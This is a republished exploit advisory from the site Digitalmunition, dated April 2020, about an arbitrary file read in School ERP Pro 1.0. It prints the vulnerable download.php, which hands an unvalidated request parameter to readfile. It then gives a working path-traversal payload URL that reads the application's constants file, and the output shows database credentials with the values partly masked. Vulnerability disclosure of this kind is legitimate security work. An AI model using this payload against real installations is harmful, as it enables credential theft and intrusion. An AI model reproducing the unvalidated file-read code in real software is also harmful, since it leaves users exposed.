School ERP Pro 1.0 Arbitrary File Read ↭ – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on April 29th, 2020 📆 | 5026 Views ⚑

0

School ERP Pro 1.0 Arbitrary File Read ↭

# Exploit Title: School ERP Pro 1.0 – Arbitrary File Read
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT
# CVE: N/A

Vulnerable code: (/student_staff/download.php)
– File Name: download.php
– Content of the download.php

< ?php
if ( isset($_REQUEST[“document”])&&$_REQUEST[“document”]!=””) {
$file = $_REQUEST[‘document’];
header(“Content-type: application/force-download”);
header(“Content-Transfer-Encoding: Binary”);
header(“Content-length: “.filesize($file));
header(“Content-disposition: attachment; filename=””.$file.”””);
readfile($file);
exit;
}
?>

————
*Payload:*
—————

http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php
————————
*After run payload: (we accessed of the file content)*
————————

< ?php

define(‘DB_SERVER’, ‘localhost’);
define(‘DB_SERVER_USERNAME’, ‘aroxi********’);
define(‘DB_SERVER_PASSWORD’, ‘erp**********’);
define(‘DB_DATABASE’, ‘aroxi****************’);
?>

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...